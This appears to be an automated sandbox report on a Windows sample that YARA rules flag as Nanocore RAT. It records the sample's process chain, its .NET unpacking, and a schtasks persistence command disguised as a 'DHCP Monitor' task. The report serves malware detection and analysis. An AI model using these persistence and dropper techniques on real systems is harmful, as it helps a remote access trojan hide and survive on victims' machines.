Source: 8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.3.mmuiqlcvwo.pif.43c9268.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.784402740.00000000060F0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.784402740.00000000060F0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: mmuiqlcvwo.pif PID: 5828, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: mmuiqlcvwo.pif PID: 5828, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 6240, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 6240, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_008633A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,

8_2_008633A3

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: String function: 00846B90 appears 39 times
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: String function: 008759E6 appears 65 times
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: String function: 008414F7 appears 36 times
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: String function: 001AD940 appears 51 times
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: String function: 001AE2F0 appears 31 times
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: String function: 001AD870 appears 35 times

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

Code function: 0_2_00196FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00196FC6

Source: YdACOWCggQ.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

File created: C:\Users\user\33920049

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/36@23/2

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

Code function: 0_2_00196D06 GetLastError,FormatMessageW,

0_2_00196D06

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

Code function: 0_2_001A963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_001A963A

Source: YdACOWCggQ.exe

Virustotal: Detection: 35%

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

File read: C:\Users\user\Desktop\YdACOWCggQ.exe

Jump to behavior

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\YdACOWCggQ.exe 'C:\Users\user\Desktop\YdACOWCggQ.exe'
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpB828.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpB828.tmp'	Jump to behavior

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_008633A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,		8_2_008633A3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00894AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,		8_2_00894AEB

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

File created: C:\Users\user\temp\qhqulleu.mp3

Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_0089E0F6 CoInitialize,CoCreateInstance,CoUninitialize,

8_2_0089E0F6

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_0088D606 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,

8_2_0088D606

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_00863EC5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,FindCloseChangeNotification,

8_2_00863EC5

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{c213d282-998c-4a04-8f80-944681ca75f6}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6364:120:WilError_01

Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Command line argument: sfxname	0_2_001ACBB8
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Command line argument: sfxstime	0_2_001ACBB8
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Command line argument: STARTDLG	0_2_001ACBB8

Source: 14.2.RegSvcs.exe.1300000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 14.2.RegSvcs.exe.1300000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.RegSvcs.exe.1300000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: YdACOWCggQ.exe

Static file information: File size 1073384 > 1048576

Source: YdACOWCggQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: YdACOWCggQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: YdACOWCggQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: YdACOWCggQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: YdACOWCggQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: YdACOWCggQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: YdACOWCggQ.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: YdACOWCggQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: YdACOWCggQ.exe
Source:	Binary string: \??\C:\Users\user~1\AppData\Local\Temp\RegSvcs.pdb.0 source: RegSvcs.exe, 0000000E.00000003.312234271.0000000001AF7000.00000004.00000001.sdmp
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000E.00000002.774203048.0000000000E82000.00000002.00020000.sdmp, RegSvcs.exe, 00000011.00000000.313037318.0000000000BE2000.00000002.00020000.sdmp, RegSvcs.exe.8.dr
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe.8.dr
Source:	Binary string: C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 0000000E.00000003.312234271.0000000001AF7000.00000004.00000001.sdmp

Source: YdACOWCggQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: YdACOWCggQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: YdACOWCggQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: YdACOWCggQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: YdACOWCggQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 14.2.RegSvcs.exe.1300000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.RegSvcs.exe.1300000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001AE336 push ecx; ret	0_2_001AE349
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	Code function: 0_2_001AD870 push eax; ret	0_2_001AD88E
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_0085D53C push 740085CFh; iretd	8_2_0085D541
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 8_2_00846BD5 push ecx; ret	8_2_00846BE8
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 14_2_036A9EA8 push eax; ret	14_2_036A9EBE

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 8_2_0083EE30 LoadLibraryA,GetProcAddress,

8_2_0083EE30

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

File created: C:\Users\user\33920049\__tmp_rar_sfx_access_check_4279718

Jump to behavior

Source: 14.2.RegSvcs.exe.1300000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 14.2.RegSvcs.exe.1300000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Drops PE files with a suspicious file extension

Show sources

Source: C:\Users\user\Desktop\YdACOWCggQ.exe

File created: C:\Users\user\33920049\mmuiqlcvwo.pif

Jump to dropped file

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe			Jump to dropped file
Source: C:\Users\user\Desktop\YdACOWCggQ.exe	File created: C:\Users\user\33920049\mmuiqlcvwo.pif			Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpB828.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

